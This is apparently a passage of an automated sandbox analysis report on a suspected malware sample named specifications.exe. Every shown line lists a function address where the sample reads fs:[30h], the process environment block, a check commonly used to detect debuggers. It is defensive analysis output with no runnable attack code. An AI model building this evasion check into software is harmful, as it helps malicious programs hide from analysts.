                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010883C0 mov eax, dword ptr fs:[00000030h]2_2_010883C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010883C0 mov eax, dword ptr fs:[00000030h]2_2_010883C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010883C0 mov eax, dword ptr fs:[00000030h]2_2_010883C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E3DB mov eax, dword ptr fs:[00000030h]2_2_0112E3DB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E3DB mov eax, dword ptr fs:[00000030h]2_2_0112E3DB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E3DB mov ecx, dword ptr fs:[00000030h]2_2_0112E3DB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112E3DB mov eax, dword ptr fs:[00000030h]2_2_0112E3DB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011063C0 mov eax, dword ptr fs:[00000030h]2_2_011063C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113C3CD mov eax, dword ptr fs:[00000030h]2_2_0113C3CD
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010903E9 mov eax, dword ptr fs:[00000030h]2_2_010903E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B63FF mov eax, dword ptr fs:[00000030h]2_2_010B63FF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E3F0 mov eax, dword ptr fs:[00000030h]2_2_0109E3F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E3F0 mov eax, dword ptr fs:[00000030h]2_2_0109E3F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E3F0 mov eax, dword ptr fs:[00000030h]2_2_0109E3F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107823B mov eax, dword ptr fs:[00000030h]2_2_0107823B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113A250 mov eax, dword ptr fs:[00000030h]2_2_0113A250
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113A250 mov eax, dword ptr fs:[00000030h]2_2_0113A250
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0115625D mov eax, dword ptr fs:[00000030h]2_2_0115625D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086259 mov eax, dword ptr fs:[00000030h]2_2_01086259
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01108243 mov eax, dword ptr fs:[00000030h]2_2_01108243
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01108243 mov ecx, dword ptr fs:[00000030h]2_2_01108243
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107A250 mov eax, dword ptr fs:[00000030h]2_2_0107A250
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084260 mov eax, dword ptr fs:[00000030h]2_2_01084260
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084260 mov eax, dword ptr fs:[00000030h]2_2_01084260
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084260 mov eax, dword ptr fs:[00000030h]2_2_01084260
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107826B mov eax, dword ptr fs:[00000030h]2_2_0107826B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE284 mov eax, dword ptr fs:[00000030h]2_2_010BE284
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE284 mov eax, dword ptr fs:[00000030h]2_2_010BE284
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100283 mov eax, dword ptr fs:[00000030h]2_2_01100283
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100283 mov eax, dword ptr fs:[00000030h]2_2_01100283
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100283 mov eax, dword ptr fs:[00000030h]2_2_01100283
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902A0 mov eax, dword ptr fs:[00000030h]2_2_010902A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902A0 mov eax, dword ptr fs:[00000030h]2_2_010902A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov ecx, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011562D6 mov eax, dword ptr fs:[00000030h]2_2_011562D6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902E1 mov eax, dword ptr fs:[00000030h]2_2_010902E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902E1 mov eax, dword ptr fs:[00000030h]2_2_010902E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902E1 mov eax, dword ptr fs:[00000030h]2_2_010902E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116500 mov eax, dword ptr fs:[00000030h]2_2_01116500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088550 mov eax, dword ptr fs:[00000030h]2_2_01088550
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088550 mov eax, dword ptr fs:[00000030h]2_2_01088550
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B656A mov eax, dword ptr fs:[00000030h]2_2_010B656A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B656A mov eax, dword ptr fs:[00000030h]2_2_010B656A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B656A mov eax, dword ptr fs:[00000030h]2_2_010B656A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B4588 mov eax, dword ptr fs:[00000030h]2_2_010B4588
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01082582 mov eax, dword ptr fs:[00000030h]2_2_01082582
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01082582 mov ecx, dword ptr fs:[00000030h]2_2_01082582
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE59C mov eax, dword ptr fs:[00000030h]2_2_010BE59C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011005A7 mov eax, dword ptr fs:[00000030h]2_2_011005A7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011005A7 mov eax, dword ptr fs:[00000030h]2_2_011005A7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011005A7 mov eax, dword ptr fs:[00000030h]2_2_011005A7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A45B1 mov eax, dword ptr fs:[00000030h]2_2_010A45B1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A45B1 mov eax, dword ptr fs:[00000030h]2_2_010A45B1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE5CF mov eax, dword ptr fs:[00000030h]2_2_010BE5CF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE5CF mov eax, dword ptr fs:[00000030h]2_2_010BE5CF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010865D0 mov eax, dword ptr fs:[00000030h]2_2_010865D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA5D0 mov eax, dword ptr fs:[00000030h]2_2_010BA5D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA5D0 mov eax, dword ptr fs:[00000030h]2_2_010BA5D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC5ED mov eax, dword ptr fs:[00000030h]2_2_010BC5ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC5ED mov eax, dword ptr fs:[00000030h]2_2_010BC5ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010825E0 mov eax, dword ptr fs:[00000030h]2_2_010825E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8402 mov eax, dword ptr fs:[00000030h]2_2_010B8402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8402 mov eax, dword ptr fs:[00000030h]2_2_010B8402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8402 mov eax, dword ptr fs:[00000030h]2_2_010B8402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107C427 mov eax, dword ptr fs:[00000030h]2_2_0107C427
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E420 mov eax, dword ptr fs:[00000030h]2_2_0107E420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E420 mov eax, dword ptr fs:[00000030h]2_2_0107E420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E420 mov eax, dword ptr fs:[00000030h]2_2_0107E420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113A456 mov eax, dword ptr fs:[00000030h]2_2_0113A456
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A245A mov eax, dword ptr fs:[00000030h]2_2_010A245A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107645D mov eax, dword ptr fs:[00000030h]2_2_0107645D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C460 mov ecx, dword ptr fs:[00000030h]2_2_0110C460
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AA470 mov eax, dword ptr fs:[00000030h]2_2_010AA470
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AA470 mov eax, dword ptr fs:[00000030h]2_2_010AA470
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AA470 mov eax, dword ptr fs:[00000030h]2_2_010AA470
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113A49A mov eax, dword ptr fs:[00000030h]2_2_0113A49A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110A4B0 mov eax, dword ptr fs:[00000030h]2_2_0110A4B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010864AB mov eax, dword ptr fs:[00000030h]2_2_010864AB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B44B0 mov ecx, dword ptr fs:[00000030h]2_2_010B44B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010804E5 mov ecx, dword ptr fs:[00000030h]2_2_010804E5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC700 mov eax, dword ptr fs:[00000030h]2_2_010BC700
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080710 mov eax, dword ptr fs:[00000030h]2_2_01080710
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B0710 mov eax, dword ptr fs:[00000030h]2_2_010B0710
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC720 mov eax, dword ptr fs:[00000030h]2_2_010BC720
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC720 mov eax, dword ptr fs:[00000030h]2_2_010BC720
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B273C mov eax, dword ptr fs:[00000030h]2_2_010B273C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B273C mov ecx, dword ptr fs:[00000030h]2_2_010B273C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B273C mov eax, dword ptr fs:[00000030h]2_2_010B273C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FC730 mov eax, dword ptr fs:[00000030h]2_2_010FC730
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01104755 mov eax, dword ptr fs:[00000030h]2_2_01104755
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B674D mov esi, dword ptr fs:[00000030h]2_2_010B674D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B674D mov eax, dword ptr fs:[00000030h]2_2_010B674D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B674D mov eax, dword ptr fs:[00000030h]2_2_010B674D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E75D mov eax, dword ptr fs:[00000030h]2_2_0110E75D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080750 mov eax, dword ptr fs:[00000030h]2_2_01080750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2750 mov eax, dword ptr fs:[00000030h]2_2_010C2750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2750 mov eax, dword ptr fs:[00000030h]2_2_010C2750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088770 mov eax, dword ptr fs:[00000030h]2_2_01088770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112678E mov eax, dword ptr fs:[00000030h]2_2_0112678E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010807AF mov eax, dword ptr fs:[00000030h]2_2_010807AF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011347A0 mov eax, dword ptr fs:[00000030h]2_2_011347A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108C7C0 mov eax, dword ptr fs:[00000030h]2_2_0108C7C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011007C3 mov eax, dword ptr fs:[00000030h]2_2_011007C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A27ED mov eax, dword ptr fs:[00000030h]2_2_010A27ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A27ED mov eax, dword ptr fs:[00000030h]2_2_010A27ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A27ED mov eax, dword ptr fs:[00000030h]2_2_010A27ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E7E1 mov eax, dword ptr fs:[00000030h]2_2_0110E7E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010847FB mov eax, dword ptr fs:[00000030h]2_2_010847FB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010847FB mov eax, dword ptr fs:[00000030h]2_2_010847FB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE609 mov eax, dword ptr fs:[00000030h]2_2_010FE609
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2619 mov eax, dword ptr fs:[00000030h]2_2_010C2619
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108262C mov eax, dword ptr fs:[00000030h]2_2_0108262C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B6620 mov eax, dword ptr fs:[00000030h]2_2_010B6620
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8620 mov eax, dword ptr fs:[00000030h]2_2_010B8620
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E627 mov eax, dword ptr fs:[00000030h]2_2_0109E627
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109C640 mov eax, dword ptr fs:[00000030h]2_2_0109C640
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA660 mov eax, dword ptr fs:[00000030h]2_2_010BA660
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA660 mov eax, dword ptr fs:[00000030h]2_2_010BA660
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114866E mov eax, dword ptr fs:[00000030h]2_2_0114866E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114866E mov eax, dword ptr fs:[00000030h]2_2_0114866E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B2674 mov eax, dword ptr fs:[00000030h]2_2_010B2674
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084690 mov eax, dword ptr fs:[00000030h]2_2_01084690
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084690 mov eax, dword ptr fs:[00000030h]2_2_01084690
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC6A6 mov eax, dword ptr fs:[00000030h]2_2_010BC6A6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B66B0 mov eax, dword ptr fs:[00000030h]2_2_010B66B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA6C7 mov ebx, dword ptr fs:[00000030h]2_2_010BA6C7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA6C7 mov eax, dword ptr fs:[00000030h]2_2_010BA6C7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011006F1 mov eax, dword ptr fs:[00000030h]2_2_011006F1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011006F1 mov eax, dword ptr fs:[00000030h]2_2_011006F1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C912 mov eax, dword ptr fs:[00000030h]2_2_0110C912
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE908 mov eax, dword ptr fs:[00000030h]2_2_010FE908
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE908 mov eax, dword ptr fs:[00000030h]2_2_010FE908
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01078918 mov eax, dword ptr fs:[00000030h]2_2_01078918
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01078918 mov eax, dword ptr fs:[00000030h]2_2_01078918
